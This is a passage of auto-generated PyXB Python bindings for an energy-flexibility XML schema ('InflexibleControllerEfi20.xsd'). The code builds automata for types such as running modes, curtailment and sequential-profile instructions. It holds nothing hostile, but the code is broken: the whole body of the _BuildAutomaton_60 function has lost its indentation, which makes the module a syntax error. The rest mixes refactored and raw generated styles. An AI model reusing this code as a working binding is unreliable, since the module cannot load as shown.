    loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 621, 5)
    mode_use = pyxb.binding.content.ElementUse(StorageContinuousRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningModeElement')), loc)
    mode_state = fac.State(mode_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    # Self-loop allows unbounded repetition of the element.
    mode_state._set_transitionSet([fac.Transition(mode_state, [])])
    return fac.Automaton([mode_state], set(), False, containing_state=None)
# Attach the compiled content-model automaton to StorageContinuousRunningMode.
StorageContinuousRunningMode._Automaton = _BuildAutomaton_53()
# Register the children of the anonymous complex type CTD_ANON_17 (lowerBound, upperBound).
CTD_ANON_17._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), CTD_ANON_18, scope=CTD_ANON_17, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 626, 10)))
CTD_ANON_17._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), CTD_ANON_19, scope=CTD_ANON_17, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 633, 10)))
def _BuildAutomaton_54 ():
    # One-shot helper: build the automaton for CTD_ANON_17, then remove
    # this function from the module namespace.
    global _BuildAutomaton_54
    del _BuildAutomaton_54
    import pyxb.utils.fac as fac
    xsd_path = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # 'lowerBound' opens the sequence; final_update=None marks it non-accepting.
    lower_use = pyxb.binding.content.ElementUse(CTD_ANON_17._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'lowerBound')), pyxb.utils.utility.Location(xsd_path, 626, 10))
    lower_state = fac.State(lower_use, is_initial=True, final_update=None, is_unordered_catenation=False)
    # 'upperBound' follows and terminates the content model.
    upper_use = pyxb.binding.content.ElementUse(CTD_ANON_17._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'upperBound')), pyxb.utils.utility.Location(xsd_path, 633, 10))
    upper_state = fac.State(upper_use, is_initial=False, final_update=set(), is_unordered_catenation=False)
    # lowerBound -> upperBound, then stop.
    lower_state._set_transitionSet([fac.Transition(upper_state, [])])
    upper_state._set_transitionSet([])
    return fac.Automaton([lower_state, upper_state], set(), False, containing_state=None)
CTD_ANON_17._Automaton = _BuildAutomaton_54()
def _BuildAutomaton_55 ():
    """Build the content-model automaton for CTD_ANON_18.

    The model is a required fillingRate element followed by six optional
    (minOccurs=0, maxOccurs=1) elements, each guarded by its own
    occurrence counter.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_55
    del _BuildAutomaton_55
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # Particles in content-model order; schema lines run consecutively
    # from 608 (fillingRate) through 614 (heatThermalPower).
    tags = ['fillingRate', 'runningCost', 'electricalPower', 'gasFlowRate',
            'heatTemperature', 'heatFlowRate', 'heatThermalPower']
    first_line = 608

    counters = set()
    guards = [None]  # the leading required particle carries no counter
    for offset in range(1, len(tags)):
        cc = fac.CounterCondition(
            min=0, max=1,
            metadata=pyxb.utils.utility.Location(xsd, first_line + offset, 3))
        counters.add(cc)
        guards.append(cc)

    automaton_states = []
    for (offset, tag) in enumerate(tags):
        symbol = pyxb.binding.content.ElementUse(
            CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(xsd, first_line + offset, 3))
        # Every state accepts; counter-guarded states must close their
        # counter on completion.
        final_update = set()
        if guards[offset] is not None:
            final_update.add(fac.UpdateInstruction(guards[offset], False))
        automaton_states.append(fac.State(symbol, is_initial=(offset == 0),
                                          final_update=final_update,
                                          is_unordered_catenation=False))

    for (offset, state) in enumerate(automaton_states):
        cc = guards[offset]
        transitions = []
        if cc is None:
            # The required first particle may advance to any later particle
            # without counter updates.
            for later in automaton_states[1:]:
                transitions.append(fac.Transition(later, []))
        else:
            # Re-enter this particle (updating its counter) or skip ahead
            # (closing it).
            transitions.append(fac.Transition(state, [fac.UpdateInstruction(cc, True)]))
            for later in automaton_states[offset + 1:]:
                transitions.append(fac.Transition(later, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Not nullable: fillingRate is required.
    return fac.Automaton(automaton_states, counters, False, containing_state=None)
CTD_ANON_18._Automaton = _BuildAutomaton_55()
def _BuildAutomaton_56 ():
    """Build the content-model automaton for CTD_ANON_19.

    Same model as CTD_ANON_18: a required fillingRate element followed by
    six optional (minOccurs=0, maxOccurs=1) counter-guarded elements.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_56
    del _BuildAutomaton_56
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # Particles in content-model order; schema lines run consecutively
    # from 608 (fillingRate) through 614 (heatThermalPower).
    tags = ['fillingRate', 'runningCost', 'electricalPower', 'gasFlowRate',
            'heatTemperature', 'heatFlowRate', 'heatThermalPower']
    first_line = 608

    counters = set()
    guards = [None]  # the leading required particle carries no counter
    for offset in range(1, len(tags)):
        cc = fac.CounterCondition(
            min=0, max=1,
            metadata=pyxb.utils.utility.Location(xsd, first_line + offset, 3))
        counters.add(cc)
        guards.append(cc)

    automaton_states = []
    for (offset, tag) in enumerate(tags):
        symbol = pyxb.binding.content.ElementUse(
            CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(xsd, first_line + offset, 3))
        # Every state accepts; counter-guarded states must close their
        # counter on completion.
        final_update = set()
        if guards[offset] is not None:
            final_update.add(fac.UpdateInstruction(guards[offset], False))
        automaton_states.append(fac.State(symbol, is_initial=(offset == 0),
                                          final_update=final_update,
                                          is_unordered_catenation=False))

    for (offset, state) in enumerate(automaton_states):
        cc = guards[offset]
        transitions = []
        if cc is None:
            # The required first particle may advance to any later particle
            # without counter updates.
            for later in automaton_states[1:]:
                transitions.append(fac.Transition(later, []))
        else:
            # Re-enter this particle (updating its counter) or skip ahead
            # (closing it).
            transitions.append(fac.Transition(state, [fac.UpdateInstruction(cc, True)]))
            for later in automaton_states[offset + 1:]:
                transitions.append(fac.Transition(later, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Not nullable: fillingRate is required.
    return fac.Automaton(automaton_states, counters, False, containing_state=None)
CTD_ANON_19._Automaton = _BuildAutomaton_56()
# Register the child element declarations for AdjustableDiscreteRunningMode:
# runningCost is xs:decimal, the remaining five are xs:double, declared at
# schema lines 828-833.
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 828, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 829, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 830, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 831, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 832, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 833, 5)))
def _BuildAutomaton_57 ():
    """Build the content-model automaton for AdjustableDiscreteRunningMode.

    All six child elements are optional (minOccurs=0, maxOccurs=1), each
    guarded by its own occurrence counter; the content model is nullable.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_57
    del _BuildAutomaton_57
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (element tag, schema line) in content-model order.
    particles = [
        ('runningCost', 828),
        ('electricalPower', 829),
        ('gasFlowRate', 830),
        ('heatTemperature', 831),
        ('heatFlowRate', 832),
        ('heatThermalPower', 833),
    ]

    counters = set()
    guards = []
    automaton_states = []
    for (tag, line) in particles:
        location = pyxb.utils.utility.Location(xsd, line, 5)
        cc = fac.CounterCondition(min=0, max=1, metadata=location)
        counters.add(cc)
        guards.append(cc)
        symbol = pyxb.binding.content.ElementUse(
            AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            location)
        # Every state is a possible entry point (all earlier particles may
        # be absent) and accepting (closing its own counter on completion).
        automaton_states.append(fac.State(
            symbol, is_initial=True,
            final_update=set([fac.UpdateInstruction(cc, False)]),
            is_unordered_catenation=False))

    for (offset, state) in enumerate(automaton_states):
        cc = guards[offset]
        # Re-enter this particle (updating its counter) or skip ahead to a
        # later particle (closing it).
        transitions = [fac.Transition(state, [fac.UpdateInstruction(cc, True)])]
        for later in automaton_states[offset + 1:]:
            transitions.append(fac.Transition(later, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Nullable: empty content is valid since every particle is optional.
    return fac.Automaton(automaton_states, counters, True, containing_state=None)
AdjustableDiscreteRunningMode._Automaton = _BuildAutomaton_57()
# Register the child element declarations for AdjustableContinuousRunningMode:
# a lowerBound (typed CTD_ANON_20) and an upperBound (typed CTD_ANON_21).
AdjustableContinuousRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), CTD_ANON_20, scope=AdjustableContinuousRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 852, 5)))
AdjustableContinuousRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), CTD_ANON_21, scope=AdjustableContinuousRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 859, 5)))
def _BuildAutomaton_58 ():
    """Build the content-model automaton for AdjustableContinuousRunningMode.

    The model is a simple sequence: a lowerBound element followed by an
    upperBound element.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_58
    del _BuildAutomaton_58
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    lower_symbol = pyxb.binding.content.ElementUse(
        AdjustableContinuousRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'lowerBound')),
        pyxb.utils.utility.Location(xsd, 852, 5))
    # final_update=None marks this state as non-accepting: a lowerBound
    # alone is not valid content.
    lower_state = fac.State(lower_symbol, is_initial=True,
                            final_update=None, is_unordered_catenation=False)
    upper_symbol = pyxb.binding.content.ElementUse(
        AdjustableContinuousRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'upperBound')),
        pyxb.utils.utility.Location(xsd, 859, 5))
    # Accepting state; no counter updates are required on completion.
    upper_state = fac.State(upper_symbol, is_initial=False,
                            final_update=set(), is_unordered_catenation=False)
    lower_state._set_transitionSet([fac.Transition(upper_state, [])])
    upper_state._set_transitionSet([])
    # No counters; the content model is not nullable.
    return fac.Automaton([lower_state, upper_state], set(), False, containing_state=None)
AdjustableContinuousRunningMode._Automaton = _BuildAutomaton_58()
def _BuildAutomaton_59 ():
    """Build the content-model automaton for CTD_ANON_20.

    All six child elements are optional (minOccurs=0, maxOccurs=1), each
    guarded by its own occurrence counter; the content model is nullable.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_59
    del _BuildAutomaton_59
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (element tag, schema line) in content-model order.
    particles = [
        ('runningCost', 840),
        ('electricalPower', 841),
        ('gasFlowRate', 842),
        ('heatTemperature', 843),
        ('heatFlowRate', 844),
        ('heatThermalPower', 845),
    ]

    counters = set()
    guards = []
    automaton_states = []
    for (tag, line) in particles:
        location = pyxb.utils.utility.Location(xsd, line, 3)
        cc = fac.CounterCondition(min=0, max=1, metadata=location)
        counters.add(cc)
        guards.append(cc)
        symbol = pyxb.binding.content.ElementUse(
            CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            location)
        # Every state is a possible entry point (all earlier particles may
        # be absent) and accepting (closing its own counter on completion).
        automaton_states.append(fac.State(
            symbol, is_initial=True,
            final_update=set([fac.UpdateInstruction(cc, False)]),
            is_unordered_catenation=False))

    for (offset, state) in enumerate(automaton_states):
        cc = guards[offset]
        # Re-enter this particle (updating its counter) or skip ahead to a
        # later particle (closing it).
        transitions = [fac.Transition(state, [fac.UpdateInstruction(cc, True)])]
        for later in automaton_states[offset + 1:]:
            transitions.append(fac.Transition(later, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Nullable: empty content is valid since every particle is optional.
    return fac.Automaton(automaton_states, counters, True, containing_state=None)
CTD_ANON_20._Automaton = _BuildAutomaton_59()
def _BuildAutomaton_60 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_60
del _BuildAutomaton_60
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
counters.add(cc_5)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_21._Automaton = _BuildAutomaton_60()
CTD_ANON_22._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), SupportedCommodities, scope=CTD_ANON_22, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 220, 6)))
def _BuildAutomaton_61 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_61
    del _BuildAutomaton_61
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    def _state(tag, line, col, initial=False, final=False):
        # Build the FAC state that matches element *tag*, declared at
        # (line, col) in the schema; only the last element is accepting.
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_22._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        return fac.State(symbol, is_initial=initial,
                         final_update=(set() if final else None),
                         is_unordered_catenation=False)
    # 'currency' is optional (0..1); its occurrence is tracked by a counter.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location(_XSD, 48, 5))
    counters = set([cc_0])
    st_0 = _state('header', 24, 3, initial=True)
    st_1 = _state('instructionProcessingDelay', 46, 5)
    st_2 = _state('deviceDescription', 47, 5)
    st_3 = _state('currency', 48, 5)
    st_4 = _state('supportedCommodities', 220, 6, final=True)
    states = [st_0, st_1, st_2, st_3, st_4]
    st_0._set_transitionSet([fac.Transition(st_1, [])])
    st_1._set_transitionSet([fac.Transition(st_2, [])])
    # After deviceDescription the optional currency may be skipped entirely.
    st_2._set_transitionSet([fac.Transition(st_3, []),
                             fac.Transition(st_4, [])])
    st_3._set_transitionSet([
        fac.Transition(st_3, [fac.UpdateInstruction(cc_0, True)]),
        fac.Transition(st_4, [fac.UpdateInstruction(cc_0, False)])])
    st_4._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_22._Automaton = _BuildAutomaton_61()
def _BuildAutomaton_62 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_62
    del _BuildAutomaton_62
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    counters = set()
    # Required elements in fixed document order; only the last is accepting.
    _layout = [('header', 24, 3),
               ('flexibilityUpdateId', 57, 5),
               ('validFrom', 58, 5)]
    states = []
    for pos, (tag, line, col) in enumerate(_layout):
        symbol = pyxb.binding.content.ElementUse(InflexibleUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        states.append(fac.State(symbol, is_initial=(pos == 0),
                                final_update=(set() if pos == len(_layout) - 1 else None),
                                is_unordered_catenation=False))
    # Straight-line chain: each state advances only to its successor.
    for current, following in zip(states, states[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
InflexibleUpdate._Automaton = _BuildAutomaton_62()
CTD_ANON_23._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfile'), CurtailmentProfile, scope=CTD_ANON_23, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 323, 6)))
def _BuildAutomaton_63 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_63
    del _BuildAutomaton_63
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    counters = set()
    # Required elements in fixed document order; only the last is accepting.
    _layout = [('header', 24, 3),
               ('instructionId', 67, 5),
               ('flexibilityUpdateId', 68, 5),
               ('isEmergencyInstruction', 69, 5),
               ('curtailmentProfile', 323, 6)]
    states = []
    for pos, (tag, line, col) in enumerate(_layout):
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_23._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        states.append(fac.State(symbol, is_initial=(pos == 0),
                                final_update=(set() if pos == len(_layout) - 1 else None),
                                is_unordered_catenation=False))
    # Straight-line chain: each state advances only to its successor.
    for current, following in zip(states, states[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_23._Automaton = _BuildAutomaton_63()
CTD_ANON_24._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), SupportedCommodities, scope=CTD_ANON_24, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 345, 6)))
def _BuildAutomaton_64 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_64
    del _BuildAutomaton_64
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    def _state(tag, line, col, initial=False, final=False):
        # Build the FAC state that matches element *tag*, declared at
        # (line, col) in the schema; only the last element is accepting.
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_24._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        return fac.State(symbol, is_initial=initial,
                         final_update=(set() if final else None),
                         is_unordered_catenation=False)
    # 'currency' is optional (0..1); its occurrence is tracked by a counter.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location(_XSD, 48, 5))
    counters = set([cc_0])
    st_0 = _state('header', 24, 3, initial=True)
    st_1 = _state('instructionProcessingDelay', 46, 5)
    st_2 = _state('deviceDescription', 47, 5)
    st_3 = _state('currency', 48, 5)
    st_4 = _state('supportedCommodities', 345, 6, final=True)
    states = [st_0, st_1, st_2, st_3, st_4]
    st_0._set_transitionSet([fac.Transition(st_1, [])])
    st_1._set_transitionSet([fac.Transition(st_2, [])])
    # After deviceDescription the optional currency may be skipped entirely.
    st_2._set_transitionSet([fac.Transition(st_3, []),
                             fac.Transition(st_4, [])])
    st_3._set_transitionSet([
        fac.Transition(st_3, [fac.UpdateInstruction(cc_0, True)]),
        fac.Transition(st_4, [fac.UpdateInstruction(cc_0, False)])])
    st_4._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_24._Automaton = _BuildAutomaton_64()
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'endBefore'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 380, 6)))
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfiles'), SequentialProfiles, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 381, 6)))
def _BuildAutomaton_65 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_65
    del _BuildAutomaton_65
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    counters = set()
    # Required elements in fixed document order; only the last is accepting.
    _layout = [('header', 24, 3),
               ('flexibilityUpdateId', 57, 5),
               ('validFrom', 58, 5),
               ('endBefore', 380, 6),
               ('sequentialProfiles', 381, 6)]
    states = []
    for pos, (tag, line, col) in enumerate(_layout):
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        states.append(fac.State(symbol, is_initial=(pos == 0),
                                final_update=(set() if pos == len(_layout) - 1 else None),
                                is_unordered_catenation=False))
    # Straight-line chain: each state advances only to its successor.
    for current, following in zip(states, states[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_25._Automaton = _BuildAutomaton_65()
CTD_ANON_26._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstructions'), SequentialProfileInstructions, scope=CTD_ANON_26, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 404, 6)))
def _BuildAutomaton_66 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_66
    del _BuildAutomaton_66
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    counters = set()
    # Required elements in fixed document order; only the last is accepting.
    _layout = [('header', 24, 3),
               ('instructionId', 67, 5),
               ('flexibilityUpdateId', 68, 5),
               ('isEmergencyInstruction', 69, 5),
               ('sequentialProfileInstructions', 404, 6)]
    states = []
    for pos, (tag, line, col) in enumerate(_layout):
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_26._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        states.append(fac.State(symbol, is_initial=(pos == 0),
                                final_update=(set() if pos == len(_layout) - 1 else None),
                                is_unordered_catenation=False))
    # Straight-line chain: each state advances only to its successor.
    for current, following in zip(states, states[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_26._Automaton = _BuildAutomaton_66()
CTD_ANON_27._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLabel'), pyxb.binding.datatypes.string, scope=CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 415, 6)))
